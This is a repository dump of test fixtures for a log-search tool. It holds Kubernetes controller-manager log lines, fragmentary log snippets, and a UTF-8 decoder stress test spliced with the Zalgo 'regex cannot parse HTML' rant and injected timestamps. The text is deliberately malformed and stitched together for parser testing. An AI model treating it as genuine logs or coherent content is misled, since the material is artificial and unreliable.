20:27:23.783215 1 flags.go:59] FLAG: --concurrent-gc-syncs="20" 38 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783219 1 flags.go:59] FLAG: --concurrent-namespace-syncs="10" 39 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783222 1 flags.go:59] FLAG: --concurrent-replicaset-syncs="5" 40 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783226 1 flags.go:59] FLAG: --concurrent-resource-quota-syncs="5" 41 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783229 1 flags.go:59] FLAG: --concurrent-service-endpoint-syncs="5" 42 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783237 1 flags.go:59] FLAG: --concurrent-service-syncs="1" 43 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783241 1 flags.go:59] FLAG: --concurrent-serviceaccount-token-syncs="5" 44 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783244 1 flags.go:59] FLAG: --concurrent-statefulset-syncs="5" 45 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783248 1 flags.go:59] FLAG: --concurrent-ttl-after-finished-syncs="5" 46 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783251 1 flags.go:59] FLAG: --concurrent_rc_syncs="5" 47 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783254 1 flags.go:59] FLAG: --configure-cloud-routes="true" 48 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783258 1 flags.go:59] FLAG: --contention-profiling="false" 49 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783264 1 flags.go:59] FLAG: --controller-start-interval="0s" 50 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783268 1 flags.go:59] FLAG: --controllers="[*,-csrsigning]" 51 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783278 1 flags.go:59] FLAG: --deleting-pods-burst="0" 52 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783282 1 flags.go:59] FLAG: --deleting-pods-qps="0.1" 53 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783288 1 flags.go:59] FLAG: --deployment-controller-sync-period="30s" 54 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783292 1 flags.go:59] FLAG: --disable-attach-detach-reconcile-sync="false" 55 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783296 1 flags.go:59] FLAG: --enable-dynamic-provisioning="true" 56 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783300 1 flags.go:59] FLAG: --enable-garbage-collector="true" 57 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783304 1 flags.go:59] FLAG: --enable-hostpath-provisioner="false" 58 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783307 1 flags.go:59] FLAG: --enable-taint-manager="true" 59 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783312 1 flags.go:59] FLAG: --endpoint-updates-batch-period="0s" 60 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783315 1 flags.go:59] FLAG: --endpointslice-updates-batch-period="0s" 61 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783319 1 flags.go:59] FLAG: --experimental-cluster-signing-duration="8760h0m0s" 62 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783325 1 flags.go:59] FLAG: --experimental-logging-sanitization="false" 63 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783329 1 flags.go:59] FLAG: --external-cloud-volume-plugin="" 64 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783332 1 flags.go:59] FLAG: --feature-gates="RotateKubeletServerCertificate=true,TTLAfterFinished=true" 65 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783348 1 flags.go:59] FLAG: --flex-volume-plugin-dir="/usr/libexec/kubernetes/kubelet-plugins/volume/exec/" 66 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783354 1 flags.go:59] FLAG: --help="false" 67 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783357 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-cpu-initialization-period="5m0s" 68 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783362 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-downscale-delay="5m0s" 69 
| 2021-07-10T20:27:23.000Z I0710 20:27:23.783366 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-downscale-stabilization="5m0s" 70 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783370 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-initial-readiness-delay="30s" 71 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783373 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-sync-period="15s" 72 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783377 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-tolerance="0.1" 73 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783384 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-upscale-delay="3m0s" 74 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783388 1 flags.go:59] FLAG: --horizontal-pod-autoscaler-use-rest-clients="true" 75 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783391 1 flags.go:59] FLAG: --http2-max-streams-per-connection="0" 76 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783400 1 flags.go:59] FLAG: --kube-api-burst="30" 77 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783403 1 flags.go:59] FLAG: --kube-api-content-type="application/vnd.kubernetes.protobuf" 78 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783408 1 flags.go:59] FLAG: --kube-api-qps="20" 79 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783413 1 flags.go:59] FLAG: --kubeconfig="/etc/kubernetes/controller-manager.conf" 80 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783421 1 flags.go:59] FLAG: --large-cluster-size-threshold="50" 81 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783425 1 flags.go:59] FLAG: --leader-elect="true" 82 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783429 1 flags.go:59] FLAG: --leader-elect-lease-duration="15s" 83 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783433 1 flags.go:59] FLAG: --leader-elect-renew-deadline="10s" 84 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783437 1 flags.go:59] FLAG: --leader-elect-resource-lock="leases" 85 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783441 1 flags.go:59] FLAG: --leader-elect-resource-name="kube-controller-manager" 86 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783445 1 flags.go:59] FLAG: --leader-elect-resource-namespace="kube-system" 87 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783449 1 flags.go:59] FLAG: --leader-elect-retry-period="2s" 88 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783456 1 flags.go:59] FLAG: --log-backtrace-at=":0" 89 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783461 1 flags.go:59] FLAG: --log-dir="" 90 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783464 1 flags.go:59] FLAG: --log-file="/var/log/kube-controller-manager.log" 91 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783469 1 flags.go:59] FLAG: --log-file-max-size="1800" 92 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783473 1 flags.go:59] FLAG: --log-flush-frequency="5s" 93 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783477 1 flags.go:59] FLAG: --logging-format="text" 94 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783481 1 flags.go:59] FLAG: --logtostderr="false" 95 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783487 1 flags.go:59] FLAG: --master="" 96 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783490 1 flags.go:59] FLAG: --max-endpoints-per-slice="100" 97 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783494 1 flags.go:59] FLAG: --min-resync-period="12h0m0s" 98 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783498 1 flags.go:59] FLAG: --mirroring-concurrent-service-endpoint-syncs="5" 99 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783502 1 flags.go:59] FLAG: --mirroring-endpointslice-updates-batch-period="0s" 100 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783507 1 flags.go:59] FLAG: --mirroring-max-endpoints-per-subset="1000" 101 
| 2021-07-10T20:27:23.000Z I0710 20:27:23.783511 1 flags.go:59] FLAG: --namespace-sync-period="5m0s" 102 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783515 1 flags.go:59] FLAG: --node-cidr-mask-size="0" 103 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783518 1 flags.go:59] FLAG: --node-cidr-mask-size-ipv4="0" 104 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783522 1 flags.go:59] FLAG: --node-cidr-mask-size-ipv6="0" 105 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783525 1 flags.go:59] FLAG: --node-eviction-rate="0.1" 106 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783530 1 flags.go:59] FLAG: --node-monitor-grace-period="40s" 107 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783534 1 flags.go:59] FLAG: --node-monitor-period="5s" 108 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783538 1 flags.go:59] FLAG: --node-startup-grace-period="1m0s" 109 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783541 1 flags.go:59] FLAG: --node-sync-period="0s" 110 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783545 1 flags.go:59] FLAG: --one-output="false" 111 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783549 1 flags.go:59] FLAG: --permit-port-sharing="false" 112 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783553 1 flags.go:59] FLAG: --pod-eviction-timeout="5m0s" 113 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783557 1 flags.go:59] FLAG: --port="10252" 114 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783561 1 flags.go:59] FLAG: --profiling="true" 115 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783565 1 flags.go:59] FLAG: --pv-recycler-increment-timeout-nfs="30" 116 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783568 1 flags.go:59] FLAG: --pv-recycler-minimum-timeout-hostpath="60" 117 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783572 1 flags.go:59] FLAG: --pv-recycler-minimum-timeout-nfs="300" 118 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783576 1 flags.go:59] FLAG: --pv-recycler-pod-template-filepath-hostpath="" 119 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783583 1 flags.go:59] FLAG: --pv-recycler-pod-template-filepath-nfs="" 120 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783587 1 flags.go:59] FLAG: --pv-recycler-timeout-increment-hostpath="30" 121 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783590 1 flags.go:59] FLAG: --pvclaimbinder-sync-period="15s" 122 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783594 1 flags.go:59] FLAG: --register-retry-count="10" 123 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783598 1 flags.go:59] FLAG: --requestheader-allowed-names="[]" 124 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783605 1 flags.go:59] FLAG: --requestheader-client-ca-file="" 125 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783609 1 flags.go:59] FLAG: --requestheader-extra-headers-prefix="[x-remote-extra-]" 126 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783616 1 flags.go:59] FLAG: --requestheader-group-headers="[x-remote-group]" 127 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783624 1 flags.go:59] FLAG: --requestheader-username-headers="[x-remote-user]" 128 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783631 1 flags.go:59] FLAG: --resource-quota-sync-period="5m0s" 129 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783635 1 flags.go:59] FLAG: --root-ca-file="/etc/kubernetes/pki/ca.crt" 130 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783639 1 flags.go:59] FLAG: --route-reconciliation-period="10s" 131 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783643 1 flags.go:59] FLAG: --secondary-node-eviction-rate="0.01" 132 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783648 1 flags.go:59] FLAG: --secure-port="10257" 133 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783652 1 flags.go:59] FLAG: 
--service-account-private-key-file="/etc/kubernetes/pki/sa.key" 134 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783656 1 flags.go:59] FLAG: --service-cluster-ip-range="10.100.0.0/16" 135 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783660 1 flags.go:59] FLAG: --show-hidden-metrics-for-version="" 136 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783663 1 flags.go:59] FLAG: --skip-headers="false" 137 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783667 1 flags.go:59] FLAG: --skip-log-headers="false" 138 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783671 1 flags.go:59] FLAG: --stderrthreshold="4" 139 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783676 1 flags.go:59] FLAG: --terminated-pod-gc-threshold="12500" 140 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783681 1 flags.go:59] FLAG: --tls-cert-file="" 141 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783684 1 flags.go:59] FLAG: --tls-cipher-suites="[]" 142 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783691 1 flags.go:59] FLAG: --tls-min-version="" 143 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783695 1 flags.go:59] FLAG: --tls-private-key-file="" 144 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783702 1 flags.go:59] FLAG: --tls-sni-cert-key="[]" 145 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783709 1 flags.go:59] FLAG: --unhealthy-zone-threshold="0.55" 146 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783714 1 flags.go:59] FLAG: --use-service-account-credentials="true" 147 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783718 1 flags.go:59] FLAG: --v="2" 148 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783721 1 flags.go:59] FLAG: --version="false" 149 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783729 1 flags.go:59] FLAG: --vmodule="" 150 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783732 1 flags.go:59] FLAG: --volume-host-allow-local-loopback="true" 151 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783736 1 flags.go:59] FLAG: --volume-host-cidr-denylist="[10.0.0.0/16]" 152 | 2021-07-10T20:27:24.000Z I0710 20:27:24.780473 1 serving.go:331] Generated self-signed cert in-memory 153 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671683 1 authentication.go:307] No authentication-kubeconfig provided in order to lookup client-ca-file in configmap/extension-apiserver-authentication in kube-system, so client certificate authentication won't work. 154 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671697 1 authentication.go:331] No authentication-kubeconfig provided in order to lookup requestheader-client-ca-file in configmap/extension-apiserver-authentication in kube-system, so request-header client certificate authentication won't work. 155 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671712 1 authorization.go:176] No authorization-kubeconfig provided, so SubjectAccessReview of authorization tokens won't work. 
156 | 2021-07-10T20:27:25.000Z I0710 20:27:25.671736 1 controllermanager.go:176] Version: v1.20.4-eks-6b7464 157 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673359 1 tlsconfig.go:200] loaded serving cert ["Generated self signed cert"]: "localhost@1625948844" [serving] validServingFor=[127.0.0.1,localhost,localhost] issuer="localhost-ca@1625948844" (2021-07-10 19:27:23 +0000 UTC to 2022-07-10 19:27:23 +0000 UTC (now=2021-07-10 20:27:25.673332535 +0000 UTC)) 158 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673666 1 named_certificates.go:53] loaded SNI cert [0/"self-signed loopback"]: "apiserver-loopback-client@1625948845" [serving] validServingFor=[apiserver-loopback-client] issuer="apiserver-loopback-client-ca@1625948845" (2021-07-10 19:27:24 +0000 UTC to 2022-07-10 19:27:24 +0000 UTC (now=2021-07-10 20:27:25.673650999 +0000 UTC)) 159 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673707 1 secure_serving.go:197] Serving securely on [::]:10257 160 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673734 1 tlsconfig.go:240] Starting DynamicServingCertificateController 161 | 2021-07-10T20:27:25.000Z I0710 20:27:25.674696 1 deprecated_insecure_serving.go:53] Serving insecurely on 127.0.0.1:10252 162 | 2021-07-10T20:28:31.031Z Log file created at: 2021/07/10 20:27:23 163 | Running on machine: ip-10-0-55-213 164 | Binary: Built with gc go1.15.8 for linux/amd64 165 | Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg 166 | 2021-07-10T20:27:25.000Z I0710 20:27:25.674750 1 leaderelection.go:243] attempting to acquire leader lease kube-system/kube-controller-manager... 167 | -------------------------------------------------------------------------------- /tests/data/000000.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/data/000000.gz -------------------------------------------------------------------------------- /tests/data/000000.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/data/000000.zip -------------------------------------------------------------------------------- /tests/data/14_3.log: -------------------------------------------------------------------------------- 1 | 2021-08-24T12:16:09.940Z","caller":"awsutils/awsutils.go:583","msg":"Using device number 0 for primary ENI: eni-0114718a8456d2591"} 2 | {"level":"debug","ts":" 3 | SomeLine -------------------------------------------------------------------------------- /tests/data/26688_17.log: -------------------------------------------------------------------------------- 1 | 2021-08-24T14-32-58.244Z complete response 2 | -------------------------------------------------------------------------------- /tests/data/35010_7.log: -------------------------------------------------------------------------------- 1 | 2021-02-05] bpf: Fix verifier jsgt branch analysis on max bound (daniel@iogearbox.net) 2 | + [9e6de38] [SomeLine -------------------------------------------------------------------------------- /tests/data/UTF-8-Test.txt: -------------------------------------------------------------------------------- 1 | 2021-07-07T16:46:30.000Z UTF-8 decoder capability and stress test INFO Starting up agent subsystem INFO [ssm-session-worker]User name,AWS access key,Event time"serviceName": "guardduty""schemaVersion" 2 | ---------------------------------------- 3 | 4 | 
5 | You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML. As I have answered in HTML-and-regex questions here so many times before, the use of regex will not allow you to consume HTML. Regular expressions are a tool that is insufficiently sophisticated to understand the constructs employed by HTML. HTML is not a regular language and hence cannot be parsed by regular expressions. Regex queries are not equipped to break down HTML into its meaningful parts. so many times but it is not getting to me. Even enhanced irregular regular expressions as used by Perl are not up to the task of parsing HTML. You will never make me crack. HTML is a language of sufficient complexity that it cannot be parsed by regular expressions. Even Jon Skeet cannot parse HTML using regular expressions. Every time you attempt to parse HTML with regular expressions, the unholy child weeps the blood of virgins, and Russian hackers pwn your webapp. Parsing HTML with regex summons tainted souls into the realm of the living. HTML and regex go together like love, marriage, and ritual infanticide. The
cannot hold it is too late. The force of regex and HTML together in the same conceptual space will destroy your mind like so much watery putty. If you parse HTML with regex you are giving in to Them and their blasphemous ways which doom us all to inhuman toil for the One whose Name cannot be expressed in the Basic Multilingual Plane, he comes. HTML-plus-regexp will liquify the n​erves of the sentient whilst you observe, your psyche withering in the onslaught of horror. Rege̿̔̉x-based HTML parsers are the cancer that is killing StackOverflow it is too late it is too late we cannot be saved the transgression of a chi͡ld ensures regex will consume all living tissue (except for HTML which it cannot, as previously prophesied) dear lord help us how can anyone survive this scourge using regex to parse HTML has doomed humanity to an eternity of dread torture and security holes using regex as a tool to process HTML establishes a breach between this world and the dread realm of c͒ͪo͛ͫrrupt entities (like SGML entities, but more corrupt) a mere glimpse of the world of reg​ex parsers for HTML will ins​tantly transport a programmer's consciousness into a world of ceaseless screaming, he comes, the pestilent slithy regex-infection wil​l devour your HT​ML parser, application and existence for all time like Visual Basic only worse he comes he comes do not fi​ght he com̡e̶s, ̕h̵i​s un̨ho͞ly radiańcé destro҉ying all enli̍̈́̂̈́ghtenment, HTML tags lea͠ki̧n͘g fr̶ǫm ̡yo​͟ur eye͢s̸ ̛l̕ik͏e liq​uid pain, the song of re̸gular exp​ression parsing will exti​nguish the voices of mor​tal man from the sp​here I can see it can you see ̲͚̖͔̙î̩́t̲͎̩̱͔́̋̀ it is beautiful t​he final snuffing of the lie​s of Man ALL IS LOŚ͖̩͇̗̪̏̈́T ALL I​S LOST the pon̷y he comes he c̶̮omes he comes the ich​or permeates all MY FACE MY FACE ᵒh god no NO NOO̼O​O NΘ stop the an​*̶͑̾̾​̅ͫ͏̙̤g͇̫͛͆̾ͫ̑͆l͖͉̗̩̳̟̍ͫͥͨe̠̅s ͎a̧͈͖r̽̾̈́͒͑e n​ot rè̑ͧ̌aͨl̘̝̙̃ͤ͂̾̆ ZA̡͊͠͝LGΌ ISͮ̂҉̯͈͕̹̘̱ TO͇̹̺ͅƝ̴ȳ̳ TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ 6 | Markus Kuhn - 2015-08-28 - CC BY 4.0 7 | 8 | This test file can help you examine, how your UTF-8 decoder handles 9 | various types of correct, malformed, or otherwise interesting UTF-8 10 | sequences. This file is not meant to be a conformance test. It does 11 | not prescribe any particular outcome. Therefore, there is no way to 12 | "pass" or "fail" this test file, even though the text does suggest a 13 | preferable decoder behaviour at some places. Its aim is, instead, to 14 | help you think about, and test, the behaviour of your UTF-8 decoder on a 15 | systematic collection of unusual inputs. Experience so far suggests 16 | that most first-time authors of UTF-8 decoders find at least one 17 | serious problem in their decoder using this file. 18 | 19 | The test lines below cover boundary conditions, malformed UTF-8 20 | sequences, as well as correctly encoded UTF-8 sequences of Unicode code 21 | points that should never occur in a correct UTF-8 file. 22 | 23 | According to ISO 10646-1:2000, sections D.7 and 2.3c, a device 24 | receiving UTF-8 shall interpret a "malformed sequence in the same way 25 | that it interprets a character that is outside the adopted subset" and 26 | "characters that are not within the adopted subset shall be indicated 27 | to the user" by a receiving device. 
One commonly used approach in 28 | UTF-8 decoders is to replace any malformed UTF-8 sequence by a 29 | replacement character (U+FFFD), which looks a bit like an inverted 30 | question mark, or a similar symbol. It might be a good idea to 31 | visually distinguish a malformed UTF-8 sequence from a correctly 32 | encoded Unicode character that is just not available in the current 33 | font but otherwise fully legal, even though ISO 10646-1 doesn't 34 | mandate this. In any case, just ignoring malformed sequences or 35 | unavailable characters does not conform to ISO 10646, will make 36 | debugging more difficult, and can lead to user confusion. 37 | 38 | Please check, whether a malformed UTF-8 sequence is (1) represented at 39 | all, (2) represented by exactly one single replacement character (or 40 | equivalent signal), and (3) the following quotation mark after an 41 | illegal UTF-8 sequence is correctly displayed, i.e. proper 42 | resynchronization takes place immediately after any malformed 43 | sequence. This file says "THE END" in the last line, so if you don't 44 | see that, your decoder crashed somehow before, which should always be 45 | cause for concern. 46 | 47 | All lines in this file are exactly 79 characters long (plus the line 48 | feed). In addition, all lines end with "|", except for the two test 49 | lines 2.1.1 and 2.2.1, which contain non-printable ASCII controls 50 | U+0000 and U+007F. If you display this file with a fixed-width font, 51 | these "|" characters should all line up in column 79 (right margin). 52 | This allows you to test quickly, whether your UTF-8 decoder finds the 53 | correct number of characters in every line, that is whether each 54 | malformed sequences is replaced by a single replacement character. 55 | 56 | Note that, as an alternative to the notion of malformed sequence used 57 | here, it is also a perfectly acceptable (and in some situations even 58 | preferable) solution to represent each individual byte of a malformed 59 | sequence with a replacement character. If you follow this strategy in 60 | your decoder, then please ignore the "|" column. 61 | 62 | 63 | Here come the tests: | 64 | | 65 | 1 Some correct UTF-8 text | 66 | | 67 | You should see the Greek word 'kosme': "κόσμε" | 68 | | 69 | 2 Boundary condition test cases | 70 | | 71 | 2.1 First possible sequence of a certain length | 72 | | 73 | 2.1.1 1 byte (U-00000000): "" 74 | 2.1.2 2 bytes (U-00000080): "€" | 75 | 2.1.3 3 bytes (U-00000800): "ࠀ" | 76 | 2.1.4 4 bytes (U-00010000): "𐀀" | 77 | 2.1.5 5 bytes (U-00200000): "�����" | 78 | 2.1.6 6 bytes (U-04000000): "������" | 79 | | 80 | 2.2 Last possible sequence of a certain length | 81 | | 82 | 2.2.1 1 byte (U-0000007F): "" 83 | 2.2.2 2 bytes (U-000007FF): "߿" | 84 | 2.2.3 3 bytes (U-0000FFFF): "￿" | 85 | 2.2.4 4 bytes (U-001FFFFF): "����" | 86 | 2.2.5 5 bytes (U-03FFFFFF): "�����" | 87 | 2021-07-07T16:46:30.000Z 2.2.6 6 bytes (U-7FFFFFFF): "������" | 88 | | 89 | 2.3 Other boundary conditions | 90 | | 91 | 2.3.1 U-0000D7FF = ed 9f bf = "퟿" | 92 | 2.3.2 U-0000E000 = ee 80 80 = "" | 93 | 2.3.3 U-0000FFFD = ef bf bd = "�" | 94 | 2.3.4 U-0010FFFF = f4 8f bf bf = "􏿿" | 95 | 2.3.5 U-00110000 = f4 90 80 80 = "����" | 96 | | 97 | 3 Malformed sequences | 98 | | 99 | 3.1 Unexpected continuation bytes | 100 | | 101 | Each unexpected continuation byte should be separately signalled as a | 102 | malformed sequence of its own. 
| 103 | | 104 | 3.1.1 First continuation byte 0x80: "�" | 105 | 3.1.2 Last continuation byte 0xbf: "�" | 106 | | 107 | 3.1.3 2 continuation bytes: "��" | 108 | 3.1.4 3 continuation bytes: "���" | 109 | 3.1.5 4 continuation bytes: "����" | 110 | 3.1.6 5 continuation bytes: "�����" | 111 | 3.1.7 6 continuation bytes: "������" | 112 | 3.1.8 7 continuation bytes: "�������" | 113 | | 114 | 3.1.9 Sequence of all 64 possible continuation bytes (0x80-0xbf): | 115 | | 116 | "���������������� | 117 | ���������������� | 118 | ���������������� | 119 | ����������������" | 120 | | 121 | 3.2 Lonely start characters | 122 | | 123 | 3.2.1 All 32 first bytes of 2-byte sequences (0xc0-0xdf), | 124 | each followed by a space character: | 125 | | 126 | "� � � � � � � � � � � � � � � � | 127 | � � � � � � � � � � � � � � � � " | 128 | | 129 | 3.2.2 All 16 first bytes of 3-byte sequences (0xe0-0xef), | 130 | each followed by a space character: | 131 | | 132 | "� � � � � � � � � � � � � � � � " | 133 | | 134 | 3.2.3 All 8 first bytes of 4-byte sequences (0xf0-0xf7), | 135 | each followed by a space character: | 136 | | 137 | "� � � � � � � � " | 138 | | 139 | 3.2.4 All 4 first bytes of 5-byte sequences (0xf8-0xfb), | 140 | each followed by a space character: | 141 | | 142 | "� � � � " | 143 | | 144 | 3.2.5 All 2 first bytes of 6-byte sequences (0xfc-0xfd), | 145 | each followed by a space character: | 146 | | 147 | "� � " | 148 | | 149 | 3.3 Sequences with last continuation byte missing | 150 | | 151 | All bytes of an incomplete sequence should be signalled as a single | 152 | malformed sequence, i.e., you should see only a single replacement | 153 | character in each of the next 10 tests. (Characters as in section 2) | 154 | | 155 | 3.3.1 2-byte sequence with last byte missing (U+0000): "�" | 156 | 3.3.2 3-byte sequence with last byte missing (U+0000): "��" | 157 | 3.3.3 4-byte sequence with last byte missing (U+0000): "���" | 158 | 3.3.4 5-byte sequence with last byte missing (U+0000): "����" | 159 | 3.3.5 6-byte sequence with last byte missing (U+0000): "�����" | 160 | 3.3.6 2-byte sequence with last byte missing (U-000007FF): "�" | 161 | 3.3.7 3-byte sequence with last byte missing (U-0000FFFF): "�" | 162 | 3.3.8 4-byte sequence with last byte missing (U-001FFFFF): "���" | 163 | 3.3.9 5-byte sequence with last byte missing (U-03FFFFFF): "����" | 164 | 3.3.10 6-byte sequence with last byte missing (U-7FFFFFFF): "�����" | 165 | | 166 | 3.4 Concatenation of incomplete sequences | 167 | | 168 | All the 10 sequences of 3.3 concatenated, you should see 10 malformed | 169 | sequences being signalled: | 170 | | 171 | "�����������������������������" | 172 | | 173 | 3.5 Impossible bytes | 174 | | 175 | The following two bytes cannot appear in a correct UTF-8 string | 176 | | 177 | 3.5.1 fe = "�" | 178 | 3.5.2 ff = "�" | 179 | 3.5.3 fe fe ff ff = "����" | 180 | | 181 | 4 Overlong sequences | 182 | | 183 | The following sequences are not malformed according to the letter of | 184 | the Unicode 2.0 standard. However, they are longer then necessary and | 185 | a correct UTF-8 encoder is not allowed to produce them. A "safe UTF-8 | 186 | decoder" should reject them just like malformed sequences for two | 187 | reasons: (1) It helps to debug applications if overlong sequences are | 188 | not treated as valid representations of characters, because this helps | 189 | to spot problems more quickly. 
(2) Overlong sequences provide | 190 | alternative representations of characters, that could maliciously be | 191 | used to bypass filters that check only for ASCII characters. For | 192 | instance, a 2-byte encoded line feed (LF) would not be caught by a | 193 | line counter that counts only 0x0a bytes, but it would still be | 194 | processed as a line feed by an unsafe UTF-8 decoder later in the | 195 | pipeline. From a security point of view, ASCII compatibility of UTF-8 | 196 | sequences means also, that ASCII characters are *only* allowed to be | 197 | represented by ASCII bytes in the range 0x00-0x7f. To ensure this | 198 | aspect of ASCII compatibility, use only "safe UTF-8 decoders" that | 199 | reject overlong UTF-8 sequences for which a shorter encoding exists. | 200 | | 201 | 4.1 Examples of an overlong ASCII character | 202 | | 203 | With a safe UTF-8 decoder, all of the following five overlong | 204 | representations of the ASCII character slash 